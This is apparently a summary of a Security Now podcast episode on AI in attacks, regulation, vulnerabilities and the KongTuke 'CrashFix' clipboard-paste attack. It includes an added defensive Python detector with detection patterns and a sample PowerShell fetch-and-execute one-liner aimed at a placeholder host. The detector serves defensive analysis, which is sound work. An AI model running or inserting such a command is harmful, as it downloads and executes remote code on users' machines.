Security Now 1067: KongTuke's CrashFix — Podcast Summary
Date: March 3, 2026
Hosts: Steve Gibson & Leo Laporte
Theme: Security News, AI in Cyberattacks, Social Engineering Innovations, Notable Vulnerabilities, and the Evolving Threat Landscape
Main Theme Overview
This episode explores the accelerating use of AI (both by attackers and defenders) in modern cyberattacks, the ongoing challenges in code signing for developers, developments in government-mandated age verification, notable vulnerabilities (including a critical Cisco SD-WAN flaw), and the rise of sophisticated social engineering techniques—such as the “CrashFix” exploit used by the group KongTuke (“Kong Tuk”). The episode also covers incidents involving law enforcement’s struggle with AI-generated cyber tips, privacy regulation conflicts, and evolving approaches to national cybersecurity.
Key Discussion Points & Insights
1. Opening and Show Format
- The show was recorded early due to travel to Zero Trust World, Orlando.
- Steve and Leo reflect on keeping shows current despite shifting schedules.
- Listener engagement and editorial commentary are highlighted as central to the show's appeal.
2. Photo of the Week
[12:50] Steve:
Describes a “DIY volume limiter” — a physical hardware hack where a parent installs screws to prevent the stereo volume knob from exceeding a certain level.
- Listener suggestions indicated a security screw would be more tamper-proof.
- [13:06, Leo:] “Dad found a solution.”
3. Verification of Last Week's Viral “No-Turns” Road Sign
- Audience used AI and search tools to confirm the photo's authenticity: Simcoe, Canada.
- The sign's confusion and resultant local embarrassment discussed.
[18:11, Steve, quoting listener Joseph Rourke:]
“Despite the presence of the Tim Hortons in the background, we know this cannot be Canada, otherwise there'd be a line of cars sitting at the stop sign.”
4. AI-Driven Hacking Campaign: Fortinet Breaches
[19:00] - Main Segment
- 600+ Fortinet firewalls breached by Russian-speaking threat actors using AI-generated scripts.
- Attack exploited poor configuration: exposed management ports, weak passwords, no MFA.
- Claude and DeepSeek AIs were used to automate reconnaissance and offensive scripting.
- Steve's perspective:
AI is a tool being used by both good and bad actors; it is not inherently culpable.
[24:20, Steve:]
“We called it artificial intelligence. It's not intelligent... It's a very powerful new tool, but it's still a tool and it's not responsible for the way we use it.”
- Leo agrees: [24:40, Leo:] “As usual, it's the humans who are the problem.”
Secondary Example:
- Breach of Mexican government agencies where the media focused on Claude's use rather than root causes.
5. Age Verification: Apple's Response to Legal Pressures
[26:00] - Apple and the FTC adapt to diverging, region-dependent regulations:
- Age verification APIs and processes differ across Brazil, Australia, Singapore, Utah, Louisiana.
- Significant complexity and “fragmentation” of age assurance requirements.
- [32:40, Leo:]
“The real issue is it's unenforceable. California can't make Linux do this. They can make Apple do it, they can make Google do it because they're gatekeepers, they can go after the companies.”
6. COPPA Conflicts and Regulatory Carve-Out
[37:17] - FTC won’t enforce COPPA violations for services collecting data solely for age verification, if the data is promptly deleted and not used elsewhere.
- Legislation is forcing sites into privacy-violating practices while also requiring privacy protection—thus formal exceptions are needed.
7. Meta’s AI Causing Trouble for Law Enforcement
[44:00] - Meta’s use of AI to detect child sexual abuse material (CSAM) is creating massive volumes of false or incomplete reports.
- Law enforcement is overwhelmed and unable to act on many tips.
- [59:52, Anonymous ICAC Officer:]
“It's killing morale. We're drowning in tips and we want to get out there and do this work. We don't have the personnel to sustain that...”
- Steve’s take: these are “growing pains” of AI; legislated expectations exceed what humans can do, but AI solutions must mature.
8. Digital Repression: Russia’s VPN & Telegram Crackdowns
[60:08] - Russia blocks 469 VPNs and escalates efforts to fully block Telegram.
- Points to citizens’ desperation for outside information and increasing state control.
9. UK’s National Vulnerability Scanning: Good Idea, Bad Messaging
[62:28] - Steve lauds the UK’s ongoing, automated vulnerability scanning of public networks, but ridicules “AI-written” press releases about “weak DNS records.”
- [72:10, Steve:]
“...something that sounds entirely plausible and reasonable to a layperson, but which is actual nonsense... what is a weakness in a government DNS record?”
10. Notorious Psychotherapy Data Extortion Case Update
[82:17] - Finnish “Vastaamo hacker” who blackmailed psychotherapy patients loses his appeal; reminder of past coverage and the importance of retiring old data.
11. Social Engineering Evolution: Scattered Lapsus Hunters (SLH) Recruit Women
[84:53]
- SLH group recruits women for voice phishing; offers $500–$1,000 per call and scripts, targeting IT help desks.
- Defenses discussed:
- Training staff to recognize social engineering, regardless of caller voice.
- Strengthen identity verification and logging.
- Move away from SMS-based MFA.
[89:42, Leo:]
Describes a notorious attack where a crying baby sound and a frantic woman caller bypassed help desk suspicion, highlighting the growing sophistication and use of psychological manipulation.
12. Critical Cisco SD-WAN Vulnerability (CVSS 10.0)
[90:17]
- Authentication bypass allows total compromise and privilege escalation on Cisco SD-WAN controllers.
- Vulnerability so severe that multiple governments issued synchronized warnings.
- Steve advocates for always restricting network access (not relying only on authentication).
13. Vulnerability Exploitation Trends: VulnCheck’s 2025 Report
[97:36]
- Only 1% of disclosed vulnerabilities are exploited in the wild, but those that are become highly damaging very quickly.
- Notable rise in AI-generated proof-of-concept code, sometimes adding “AI slop” to the signal.
14. Modern Code Signing: CAs, HSMs, Self-Signing
[104:58]
- Developers frustrated by Certificate Authority consolidation and rising costs.
- Hardware Security Modules (HSMs) now required for code signing keys; Steve recommends $72 open source “SmartCard HSM.”
- Self-signing only practical for internal enterprise use; not viable for distributing software to the public due to trust chain issues.
15. AI for Real-Time Security & User Protection
[114:07]
- Listener question on using local AI agents (like Charlemagne) to prevent user mistakes.
- Steve: bullish on the concept; future AV may be replaced by user-focused, non-phoning-home AI assistants.
16. The “Kong Tuk CrashFix” Exploit: A New Twist on ClickFix
[133:56] - Main Deep Dive
- Huntress Labs uncovers new iterations of the “click fix” attack attributed to group Kong Tuk.
- Tactics:
- Malicious browser extension (“Next Shield”): Cloned lookalike of uBlock Origin Lite.
- Targets users seeking ad blockers, especially domain-joined (enterprise) machines.
- User tricked into triggering browser crash, then shown a convincing “Edge crashed — Run Scan” dialog.
- Clicking the button leads to further instructions: “Press Win-R, paste (clipboard), Enter.”
- Clipboard is populated by attack code; user unknowingly executes malware.
- [136:30, Steve:]
“Is this all it takes?”
- [139:32, Leo:]
“Sophisticated as hell. Good lord.”
- Steve warns: Windows’ power and most users’ unfamiliarity with scripting make this a lasting threat. He calls for Microsoft to quarantine clipboard contents sourced by browsers and to act at the OS level to block these abuse patterns.
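The final step of the chain above (Win-R, paste, Enter) leaves two records on the victim machine that defenders can check: the process-creation event, whose parent is explorer.exe because the Run dialog launched it, and the RunMRU registry key, where Windows keeps the last commands typed into the Run dialog. The following is an added example, not code from the podcast or from Huntress; the event field names, the sample records and the example.invalid placeholder are constructed for the demo, while the RunMRU key path and its value layout are the real ones.

```python
"""Spot Win+R (Run dialog) launches that look like pasted payloads.

Two defensive views of the same step: live process-creation telemetry
(Sysmon event 1 / Security 4688 style records, constructed here) and a
`reg export` of the RunMRU key. Field names and samples are assumptions.
"""
import re
from dataclasses import dataclass

# Run-dialog launches are children of explorer.exe.
RUN_DIALOG_PARENT = "explorer.exe"

# Script hosts and download utilities a pasted one-liner would typically invoke.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
    "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe",
}

# Traits of copy-pasted payload commands: hidden window, encoded or remote code.
TRAITS = {
    "hidden-window": re.compile(r"-(?:w|win|windowstyle)\s*hidden", re.I),
    "encoded-command": re.compile(
        r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote-fetch": re.compile(
        r"https?://|\b(?:iwr|invoke-webrequest|downloadstring)\b", re.I),
    "dynamic-eval": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}

# Real key: each Run-dialog command sits in a value a, b, c ... with a trailing
# "\1" marker; MRUList holds the recency order as a string of value names.
RUNMRU_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    user: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def trait_hits(command_line: str) -> list:
    """Names of payload traits present in a command line (empty if none)."""
    return [name for name, rx in TRAITS.items() if rx.search(command_line)]


def classify(event: ProcessEvent) -> list:
    """Traits found when a Run-dialog launch of a script host looks pasted."""
    if basename(event.parent_image) != RUN_DIALOG_PARENT:
        return []
    if basename(event.image) not in SCRIPT_HOSTS:
        return []
    return trait_hits(event.command_line)


def scan(events) -> list:
    """(event, traits) pairs for every event that trips at least one trait."""
    return [(ev, hits) for ev in events if (hits := classify(ev))]


def parse_runmru_export(text: str) -> list:
    """Commands from a `reg export` of RunMRU, most recent first."""
    values, in_key = {}, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_key = line[1:-1].lower() == RUNMRU_KEY.lower()
            continue
        if not in_key or not line.startswith('"'):
            continue
        name, _, data = line.partition("=")
        # .reg files escape backslashes and quotes with a backslash.
        data = re.sub(r"\\(.)", r"\1", data.strip('"'))
        values[name.strip('"')] = data
    order = values.pop("MRUList", "")
    return [values[n].removesuffix("\\1") for n in order if n in values]


def suspicious_runmru(text: str) -> list:
    """(command, traits) pairs for RunMRU entries that trip at least one trait."""
    return [(cmd, hits) for cmd in parse_runmru_export(text)
            if (hits := trait_hits(cmd))]


# Constructed telemetry: a benign Run-dialog launch, a pasted payload launch,
# and a scheduled script whose parent is not explorer.exe.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                 "notepad", r"CORP\alice"),
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 'powershell -w hidden -c "iwr https://example.invalid/scan | iex"',
                 r"CORP\alice"),
    ProcessEvent(PS, PS, r"powershell -File C:\scripts\backup.ps1", r"CORP\svc"),
]

# Constructed `reg export` of the same machine's RunMRU key.
SAMPLE_RUNMRU_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="powershell -w hidden -c \"iwr https://example.invalid/scan | iex\"\\1"
"MRUList"="ba"
'''

if __name__ == "__main__":
    for ev, hits in scan(SAMPLE_EVENTS):
        print(f"telemetry: {ev.user} ran {ev.command_line!r} -> {hits}")
    for cmd, hits in suspicious_runmru(SAMPLE_RUNMRU_EXPORT):
        print(f"RunMRU:    {cmd!r} -> {hits}")
```

The parent-process check alone is noisy (explorer.exe also spawns PowerShell when a user opens a shortcut), so the traits carry the signal: a hidden window plus a remote fetch or dynamic evaluation is what a pasted one-liner looks like and what an ordinary Run-dialog command does not. The RunMRU parser is the offline counterpart for a host that had no telemetry agent when the incident happened.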
17. Closing Thoughts
- Windows, macOS, and major desktop OSes are too powerful and complex for most users’ needs, making them perpetually vulnerable.
[147:38, Steve:]
“Windows is way too powerful for most people. They don't need all of this.”
- Chrome OS and other locked-down, simpler systems may become better options for most.
- Preview: next week, a deeper dive into VulnCheck’s vulnerability exploitation trends.
Notable Quotes & Moments
- [24:20, Steve Gibson:]
“We called it artificial intelligence. It's not intelligent... It's a very powerful new tool, but it's still a tool and it's not responsible for the way we use it.”
- [59:52, Anonymous ICAC Officer:]
“It's killing morale. We're drowning in tips and we want to get out there and do this work. We don't have the personnel to sustain that...”
- [136:30, Steve Gibson:]
“Is this all it takes?”
- [139:32, Leo Laporte:]
“Sophisticated as hell. Good lord.”
- [147:38, Steve Gibson:]
“Windows is way too powerful for most people. They don't need all of this.”
Important Timestamps
- [12:50]: Photo of the week—DIY volume limiter
- [19:00]: AI-driven Fortinet breach analysis
- [24:20]: Philosophical take—AI as a tool, not an actor
- [32:40]: Age verification legal complexity
- [37:17]: FTC updates on COPPA & age verification exception
- [44:00]: Meta’s AI and law enforcement overwhelmed
- [60:08]: Russia blocks VPNs, Telegram crackdown
- [62:28]: UK public sector vulnerability scanning
- [82:17]: Update on psychotherapy extortion case
- [84:53]: Women recruited by SLH for social engineering
- [90:17]: Cisco’s critical SD-WAN flaw and mitigation
- [104:58]: Modern code signing and HSMs
- [133:56]: Kong Tuk “CrashFix” exploit detailed analysis
Takeaways
- AI is now ubiquitous in both attack and defense. Security professionals and criminals alike use automation to scale their activities; AI hype should not distract from root problems like bad configuration or human error.
- Social engineering is evolving, with psychological and demographic targeting. Expect smarter attacks capitalizing on empathy, new voices, and AI-powered phishing.
- Critical vulnerabilities still demand aggressive patching and strong network segmentation. Basic IT hygiene continues to be ignored at great peril.
- Complexity and fragmentation in regulation (age validation, privacy) cause headaches for users and developers.
- Windows' “click fix” attack vector—clipboard+run dialog abuse—is a sleeping monster. Microsoft must address this vector at the OS level; users alone cannot be expected to defend themselves.
- Lockdowns, simplicity, and compartmentalization (à la Chrome OS) may be the future for most users.
For listeners who missed the episode:
This is a dense, high-value episode exploring the intersection of tech tools, human psychology, policy, and the state of modern cyber threats—emphasizing how power, complexity, and behavior outpace both our policies and our technical defenses.